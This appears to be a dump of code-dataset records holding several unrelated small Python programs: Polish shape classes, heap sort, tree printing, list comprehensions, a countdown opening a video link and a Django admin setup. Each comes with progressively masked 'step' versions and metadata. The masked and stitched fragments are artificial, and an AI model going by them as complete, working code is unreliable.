obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-4": "class Figura:\n <mask token>\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy Figura.')\n <mask token>\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Figura.')\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-5": "class Figura:\n def __init__(self):\n print(\"Tworze obiekt klasy Figura...\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy Figura.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy Figura.\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Figura.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Figura.\")\n def nadaj_kolor(self):\n print(\"Metoda nadaj_kolor klasy Figura.\")\n def usun(self):\n print(\"Metoda usun klasy Figura.\")\n\nclass Punkt(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Punkt...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Punkt.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Punkt.\")\n def usun(self):\n print(\"Metoda usun klasy Punkt.\")\n\nclass Linia(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Linia...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Linia.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Linia.\")\n def usun(self):\n print(\"Metoda usun klasy Linia.\")\n\nclass Kwadrat(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Kwadrat...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Kwadrat.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Kwadrat.\")\n def usun(self):\n print(\"Metoda usun klasy Kwadrat.\")\n\nclass XXOkrag:\n def __init__(self):\n print(\"Tworze obiekt klasy XXOkrag...\")\n def wyswietlaj(self):\n print(\"Metoda wyswietlaj klasy XXOkrag.\")\n def wypelniaj(self):\n print(\"Metoda wypelniaj klasy XXOkrag.\")\n def usuwaj(self):\n print(\"Metoda usuwaj klasy XXOkrag.\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy XXOkrag.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy XXOkrag.\")\n def ustaw_kolor(self):\n print(\"Metoda ustaw_kolor klasy XXOkrag.\")\n\nclass Okrag(Figura):\n def __init__(self):\n self.xokrag = XXOkrag()\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n def wypelnij(self):\n self.xokrag.wypelniaj()\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n def usun(self):\n self.xokrag.usuwaj()\n\nif __name__ == \"__main__\":\n\n lista_figur = [Linia(), Kwadrat(), Okrag()]\n\n for fig in lista_figur:\n fig.wyswietl()\n",
"step-ids": [
27,
30,
31,
34,
41
]
}
|
[
27,
30,
31,
34,
41
] |
def heapify(lst, index, heap_size):
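    # Sift lst[index] down within lst[:heap_size] so the subtree rooted at
    # `index` satisfies the max-heap property (largest value at the subtree root).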
largest = index
left_index = 2 * index + 1
right_index = 2 * index + 2
if left_index < heap_size and lst[left_index] > lst[largest]:
largest = left_index
if right_index < heap_size and lst[right_index] > lst[largest]:
largest = right_index
if largest != index:
lst[largest], lst[index] = lst[index], lst[largest]
heapify(lst, largest, heap_size)
def heap_sort(collection):
"""Pure implement of heap sort algorithm in Python
:param collection: some mutable ordered collection with heterogeneous
comparable items inside
    :return: the same collection, sorted in ascending order
"""
n = len(collection)
for i in range(n // 2 - 1, -1, -1):
heapify(collection, i, n)
for i in range(n - 1, 0, -1):
collection[0], collection[i] = collection[i], collection[0]
heapify(collection, 0, i)
return collection
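
# Example usage (illustrative; the sample values are arbitrary):
if __name__ == "__main__":
    data = [5, 3, 8, 1, 9, 2]
    print(heap_sort(data))  # sorts in place and returns the list: [1, 2, 3, 5, 8, 9]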
|
normal
|
{
"blob_id": "d8ea396ff8514cc10e02072ea478f0276584153d",
"index": 3274,
"step-1": "<mask token>\n",
"step-2": "def heapify(lst, index, heap_size):\n largest = index\n left_index = 2 * index + 1\n right_index = 2 * index + 2\n if left_index < heap_size and lst[left_index] > lst[largest]:\n largest = left_index\n if right_index < heap_size and lst[right_index] > lst[largest]:\n largest = right_index\n if largest != index:\n lst[largest], lst[index] = lst[index], lst[largest]\n heapify(lst, largest, heap_size)\n\n\n<mask token>\n",
"step-3": "def heapify(lst, index, heap_size):\n largest = index\n left_index = 2 * index + 1\n right_index = 2 * index + 2\n if left_index < heap_size and lst[left_index] > lst[largest]:\n largest = left_index\n if right_index < heap_size and lst[right_index] > lst[largest]:\n largest = right_index\n if largest != index:\n lst[largest], lst[index] = lst[index], lst[largest]\n heapify(lst, largest, heap_size)\n\n\ndef heap_sort(collection):\n \"\"\"Pure implement of heap sort algorithm in Python\n\n :param collection: some mutable ordered collection with heterogeneous\n comparable items inside\n :return: the same collection ordered by ascending\n \"\"\"\n n = len(collection)\n for i in range(n // 2 - 1, -1, -1):\n heapify(collection, i, n)\n for i in range(n - 1, 0, -1):\n collection[0], collection[i] = collection[i], collection[0]\n heapify(collection, 0, i)\n return collection\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
users = {1: "Tom", 2: "Bob", 3: "Bill"}
elements = {"Au": "Oltin", "Fe": "Temir", "H": "Vodorod", "O": "Kislorod"}
|
normal
|
{
"blob_id": "a24ab93983546f8ae0fab042c121ac52388e62e8",
"index": 2967,
"step-1": "<mask token>\n",
"step-2": "users = {(1): 'Tom', (2): 'Bob', (3): 'Bill'}\nelements = {'Au': 'Oltin', 'Fe': 'Temir', 'H': 'Vodorod', 'O': 'Kislorod'}\n",
"step-3": "users = {1: \"Tom\", 2: \"Bob\", 3: \"Bill\"}\n\nelements = {\"Au\": \"Oltin\", \"Fe\": \"Temir\", \"H\": \"Vodorod\", \"O\": \"Kislorod\"}",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class PrintTree(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class PrintTree(object):
def printTree(self, root):
if not root:
return
"""
        next_last is the last node of the next level; cur_last is the last node of the current level.
        temp holds the values of the current level; result holds the final output.
"""
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
<|reserved_special_token_1|>
class TreeNode(object):
<|reserved_special_token_0|>
class PrintTree(object):
def printTree(self, root):
if not root:
return
"""
        next_last is the last node of the next level; cur_last is the last node of the current level.
        temp holds the values of the current level; result holds the final output.
"""
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
<|reserved_special_token_1|>
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class PrintTree(object):
def printTree(self, root):
if not root:
return
"""
        next_last is the last node of the next level; cur_last is the last node of the current level.
        temp holds the values of the current level; result holds the final output.
"""
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
<|reserved_special_token_1|>
# _*_ coding: utf-8 _*_
# Print a binary tree level by level
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class PrintTree(object):
def printTree(self, root):
if not root:
return
'''
        next_last is the last node of the next level; cur_last is the last node of the current level.
        temp holds the values of the current level; result holds the final output.
'''
next_last = cur_last = root
_queue = [root]
result, temp = [], []
while _queue:
            # on top of the level-order traversal, keep assigning the rightmost child enqueued so far to next_last
_cur = _queue.pop(0)
temp.append(_cur.val)
if _cur.left:
_queue.append(_cur.left)
next_last = _cur.left
if _cur.right:
_queue.append(_cur.right)
next_last = _cur.right
            # when the current node is the last node of its level,
            # record the last node of the next level (cur_last = next_last) before _queue.pop(0) moves down a level
if _cur == cur_last:
result.append(temp)
temp = []
cur_last = next_last
return result
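
# Example usage (illustrative): build the tree 1 -> (2, 3) and print it level by level.
if __name__ == "__main__":
    root = TreeNode(1)
    root.left, root.right = TreeNode(2), TreeNode(3)
    print(PrintTree().printTree(root))  # -> [[1], [2, 3]]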
|
flexible
|
{
"blob_id": "4ddff57790ad191fc29fc092bcc714f0b6273100",
"index": 7755,
"step-1": "<mask token>\n\n\nclass PrintTree(object):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass PrintTree(object):\n\n def printTree(self, root):\n if not root:\n return\n \"\"\"\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n \"\"\"\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-3": "class TreeNode(object):\n <mask token>\n\n\nclass PrintTree(object):\n\n def printTree(self, root):\n if not root:\n return\n \"\"\"\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n \"\"\"\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-4": "class TreeNode(object):\n\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\nclass PrintTree(object):\n\n def printTree(self, root):\n if not root:\n return\n \"\"\"\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n \"\"\"\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-5": "# _*_ coding: utf-8 _*_\n\n# 按层打印二叉树\n\n\nclass TreeNode(object):\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\nclass PrintTree(object):\n def printTree(self, root):\n if not root:\n return\n '''\n 定义next_last为下一层的最后一个,cur_last为当前层最后一个\n temp用于存放当前行的值,resutl存放最终的结果\n '''\n next_last = cur_last = root\n _queue = [root]\n result, temp = [], []\n while _queue:\n # 在按层遍历的基础上,不断把下层最右边儿子赋值给next_last\n _cur = _queue.pop(0)\n temp.append(_cur.val)\n if _cur.left:\n _queue.append(_cur.left)\n next_last = _cur.left\n if _cur.right:\n _queue.append(_cur.right)\n next_last = _cur.right\n # 如果当前节点为此层最后的节点时,\n # 进行下层最后一个节点的赋值(cur_last=next_last),然后才由_queue.pop(0)进入下层\n if _cur == cur_last:\n result.append(temp)\n temp = []\n cur_last = next_last\n return result\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(selected_movies)
<|reserved_special_token_0|>
print(selected_movies2)
<|reserved_special_token_1|>
movies = ['Abraham Lincoln', 'Blue Steel', 'Behind Office Doors',
'Bowery at Midnight', 'Captain Kidd', 'Debbie Does Dallas',
'The Emperor Jones', 'Rain']
movies_tuple = [('Abraham Lincoln', 1993), ('Blue Steel', 1938), (
'Behind Office Doors', 1999), ('Bowery at Midnight', 2000), (
'Captain Kidd', 2010), ('Debbie Does Dallas', 1908), (
'The Emperor Jones', 2016), ('Rain', 2011)]
selected_movies = [title for title in movies if title.startswith('B')]
print(selected_movies)
selected_movies2 = [title for title, year in movies_tuple if year < 2000]
print(selected_movies2)
<|reserved_special_token_1|>
movies = ["Abraham Lincoln", "Blue Steel", "Behind Office Doors", "Bowery at Midnight", "Captain Kidd", "Debbie Does Dallas", "The Emperor Jones", "Rain"]
movies_tuple = [("Abraham Lincoln", 1993), ("Blue Steel", 1938), ("Behind Office Doors", 1999), ("Bowery at Midnight", 2000), ("Captain Kidd",2010), ("Debbie Does Dallas",1908), ("The Emperor Jones", 2016), ("Rain", 2011)]
# selected_movies = []
# for title in movies:
# if title.startswith("B"):
# selected_movies.append(title)
#list_comprehension
# [expr for val in collection]
# [expr for val in collection if <test>]
# [expr for val in collection if <test> and <test2>]
# [expr for val1 in collection1 and val2 in collection2]
#find movies that start with "B"
selected_movies = [title for title in movies if title.startswith("B")]
print(selected_movies)
#this is for tuples--- find movies released before 2000
selected_movies2 = [title for (title, year) in movies_tuple if year <2000 ]
print (selected_movies2)
|
flexible
|
{
"blob_id": "8435a69ee9793435c7483df9bb15f01ef8051479",
"index": 3340,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(selected_movies)\n<mask token>\nprint(selected_movies2)\n",
"step-3": "movies = ['Abraham Lincoln', 'Blue Steel', 'Behind Office Doors',\n 'Bowery at Midnight', 'Captain Kidd', 'Debbie Does Dallas',\n 'The Emperor Jones', 'Rain']\nmovies_tuple = [('Abraham Lincoln', 1993), ('Blue Steel', 1938), (\n 'Behind Office Doors', 1999), ('Bowery at Midnight', 2000), (\n 'Captain Kidd', 2010), ('Debbie Does Dallas', 1908), (\n 'The Emperor Jones', 2016), ('Rain', 2011)]\nselected_movies = [title for title in movies if title.startswith('B')]\nprint(selected_movies)\nselected_movies2 = [title for title, year in movies_tuple if year < 2000]\nprint(selected_movies2)\n",
"step-4": "movies = [\"Abraham Lincoln\", \"Blue Steel\", \"Behind Office Doors\", \"Bowery at Midnight\", \"Captain Kidd\", \"Debbie Does Dallas\", \"The Emperor Jones\", \"Rain\"]\n\nmovies_tuple = [(\"Abraham Lincoln\", 1993), (\"Blue Steel\", 1938), (\"Behind Office Doors\", 1999), (\"Bowery at Midnight\", 2000), (\"Captain Kidd\",2010), (\"Debbie Does Dallas\",1908), (\"The Emperor Jones\", 2016), (\"Rain\", 2011)]\n\n# selected_movies = []\n# for title in movies:\n# if title.startswith(\"B\"):\n# selected_movies.append(title)\n\n#list_comprehension\n\n# [expr for val in collection]\n# [expr for val in collection if <test>]\n# [expr for val in collection if <test> and <test2>]\n# [expr for val1 in collection1 and val2 in collection2]\n\n#find movies that starts with \"B\"\nselected_movies = [title for title in movies if title.startswith(\"B\")]\nprint(selected_movies)\n\n\n#this is for tuples--- find movies released before 2000\nselected_movies2 = [title for (title, year) in movies_tuple if year <2000 ]\nprint (selected_movies2)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import webbrowser
import time
x = 10
while x > 0:  # countdown from 10, one second per step
    print(x)
    time.sleep(1)
    x = x - 1
if x == 0:  # countdown finished: celebrate and open the video once
    print("MEOW")
    webbrowser.open("https://www.youtube.com/watch?v=IuysY1BekOE")
|
normal
|
{
"blob_id": "4d31357936ce53b2be5f9a952b99df58baffe7ea",
"index": 4937,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-3": "<mask token>\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-4": "import webbrowser\nimport time\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-5": "import webbrowser\nimport time\nx=10\nwhile x > 0:\n print (x), time.sleep(1)\n x=x-1\nwhile x==0:\n print (\"MEOW\")\n webbrowser.open(\"https://www.youtube.com/watch?v=IuysY1BekOE\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DatabaseAdmin(admin.ModelAdmin):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
<|reserved_special_token_0|>
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GPSInline(admin.TabularInline):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DatabaseAdmin(admin.ModelAdmin):
list_display = ('database_id', 'name', 'category',
'short_profiler_status', 'socrata_status', 'source_agency',
'has_bounding_box')
search_fields = ('profiler_status', 'database_id', 'category', 'name',
'description', 'owner', 'tags')
list_filter = ['profiler_status', 'category', 'owner', 'author',
'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline]
<|reserved_special_token_0|>
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
<|reserved_special_token_0|>
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnInline(admin.TabularInline):
model = Column
class GPSInline(admin.TabularInline):
model = GpsData
classes = 'collapse',
class DatabaseAdmin(admin.ModelAdmin):
list_display = ('database_id', 'name', 'category',
'short_profiler_status', 'socrata_status', 'source_agency',
'has_bounding_box')
search_fields = ('profiler_status', 'database_id', 'category', 'name',
'description', 'owner', 'tags')
list_filter = ['profiler_status', 'category', 'owner', 'author',
'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline]
<|reserved_special_token_0|>
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
<|reserved_special_token_0|>
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnInline(admin.TabularInline):
model = Column
class GPSInline(admin.TabularInline):
model = GpsData
classes = 'collapse',
class DatabaseAdmin(admin.ModelAdmin):
list_display = ('database_id', 'name', 'category',
'short_profiler_status', 'socrata_status', 'source_agency',
'has_bounding_box')
search_fields = ('profiler_status', 'database_id', 'category', 'name',
'description', 'owner', 'tags')
list_filter = ['profiler_status', 'category', 'owner', 'author',
'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline]
admin.site.register(Database, DatabaseAdmin)
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
admin.site.register(Alarm, AlarmAdmin)
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
admin.site.register(System, SystemAdmin)
<|reserved_special_token_1|>
from django.contrib import admin
# from django.contrib.admin import AdminSite
# class MyAdminSite(AdminSite):
# site_header = 'Finder Administration'
# admin_site = MyAdminSite(name='Finder Admin')
from finder.models import Database, Column, GpsData, Alarm, System
class ColumnInline(admin.TabularInline):
model = Column
class GPSInline(admin.TabularInline):
model = GpsData
classes= ('collapse',)
class DatabaseAdmin(admin.ModelAdmin):
# fieldsets = [
# (None, {'fields': ['database_id']}),
# ('Database Info', {#'classes': ('collapse',),
# 'fields': ['rows',
# 'missing_rows',
# 'columns_count',
# 'columns_geo_count',
# 'columns_numeric_count',
# 'columns_temporal_count',
# 'columns_text_count',
# 'values',
# 'values_missing']}
# ),
# ('Profiler Info', {#'classes': ('collapse',),
# 'fields': ['profiler_input_file',
# 'profiler_status',
# 'profiler_time_begin',
# 'profiler_time_end',
# 'socrata_author',
# 'socrata_download_count',
# 'socrata_view_count']}
# ),
# ('Socrata Metadata', {#'classes': ('collapse',),
# 'fields': ['socrata_status',
# 'socrata_description',
# 'socrata_category',
# 'socrata_owner',
# 'socrata_author',
# 'socrata_download_count',
# 'socrata_view_count']}
# ),
# ('GPS Data', {#'classes': ('collapse',),
# 'fields': [ 'gps_values', 'lat_min', 'lat_max', 'long_min', 'long_max']}
# ),
# ]
list_display = ('database_id', 'name', 'category', 'short_profiler_status', 'socrata_status',
#'socrata_primary', 'rows', 'columns_count', 'missing_percent',
'source_agency',
'has_bounding_box')
search_fields = ('profiler_status','database_id','category','name', 'description','owner','tags',)
list_filter = ['profiler_status', 'category', 'owner', 'author', 'socrata_status']
prepopulated_fields = {'name': ('database_id',)}
inlines = [ColumnInline
#, GPSInline
]
admin.site.register(Database, DatabaseAdmin)
class AlarmAdmin(admin.ModelAdmin):
list_display = ['name', 'severity', 'query']
list_filter = ['severity']
admin.site.register(Alarm, AlarmAdmin)
class SystemAdmin(admin.ModelAdmin):
list_display = ['update_time', 'source_file']
admin.site.register(System, SystemAdmin)
|
flexible
|
{
"blob_id": "e1968e0d6146ce7656505eeed8e9f31daa4b558a",
"index": 5447,
"step-1": "<mask token>\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\n<mask token>\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass GPSInline(admin.TabularInline):\n <mask token>\n <mask token>\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('database_id', 'name', 'category',\n 'short_profiler_status', 'socrata_status', 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status', 'database_id', 'category', 'name',\n 'description', 'owner', 'tags')\n list_filter = ['profiler_status', 'category', 'owner', 'author',\n 'socrata_status']\n prepopulated_fields = {'name': ('database_id',)}\n inlines = [ColumnInline]\n\n\n<mask token>\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\n<mask token>\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ColumnInline(admin.TabularInline):\n model = Column\n\n\nclass GPSInline(admin.TabularInline):\n model = GpsData\n classes = 'collapse',\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('database_id', 'name', 'category',\n 'short_profiler_status', 'socrata_status', 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status', 'database_id', 'category', 'name',\n 'description', 'owner', 'tags')\n list_filter = ['profiler_status', 'category', 'owner', 'author',\n 'socrata_status']\n prepopulated_fields = {'name': ('database_id',)}\n inlines = [ColumnInline]\n\n\n<mask token>\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\n<mask token>\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ColumnInline(admin.TabularInline):\n model = Column\n\n\nclass GPSInline(admin.TabularInline):\n model = GpsData\n classes = 'collapse',\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('database_id', 'name', 'category',\n 'short_profiler_status', 'socrata_status', 'source_agency',\n 'has_bounding_box')\n search_fields = ('profiler_status', 'database_id', 'category', 'name',\n 'description', 'owner', 'tags')\n list_filter = ['profiler_status', 'category', 'owner', 'author',\n 'socrata_status']\n prepopulated_fields = {'name': ('database_id',)}\n inlines = [ColumnInline]\n\n\nadmin.site.register(Database, DatabaseAdmin)\n\n\nclass AlarmAdmin(admin.ModelAdmin):\n list_display = ['name', 'severity', 'query']\n list_filter = ['severity']\n\n\nadmin.site.register(Alarm, AlarmAdmin)\n\n\nclass SystemAdmin(admin.ModelAdmin):\n list_display = ['update_time', 'source_file']\n\n\nadmin.site.register(System, SystemAdmin)\n",
"step-5": "from django.contrib import admin\n\n# from django.contrib.admin import AdminSite\n# class MyAdminSite(AdminSite):\n# site_header = 'Finder Administration'\n# admin_site = MyAdminSite(name='Finder Admin')\n\n\nfrom finder.models import Database, Column, GpsData, Alarm, System\n\nclass ColumnInline(admin.TabularInline):\n model = Column\n\nclass GPSInline(admin.TabularInline):\n model = GpsData\n classes= ('collapse',)\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n # fieldsets = [\n # \t\t\t\t(None, {'fields': ['database_id']}),\n # \t\t\t\t('Database Info', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': ['rows',\n # \t\t\t\t\t\t\t\t\t\t\t 'missing_rows', \n # \t\t\t\t\t\t\t\t\t\t\t 'columns_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'columns_geo_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'columns_numeric_count', \n # \t\t\t\t\t\t\t\t\t\t\t 'columns_temporal_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'columns_text_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'values',\n # \t\t\t\t\t\t\t\t\t\t\t 'values_missing']}\n # \t\t\t),\n # \t\t\t('Profiler Info', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': ['profiler_input_file',\n # \t\t\t\t\t\t\t\t\t\t\t 'profiler_status', \n # \t\t\t\t\t\t\t\t\t\t\t 'profiler_time_begin',\n # \t\t\t\t\t\t\t\t\t\t\t 'profiler_time_end',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_author', \n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_download_count',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_view_count']}\n # \t\t\t),\n # \t\t\t('Socrata Metadata', {#'classes': ('collapse',),\n # \t\t\t\t\t\t\t\t'fields': ['socrata_status',\n # \t\t\t\t\t\t\t\t\t\t\t 'socrata_description', \n # 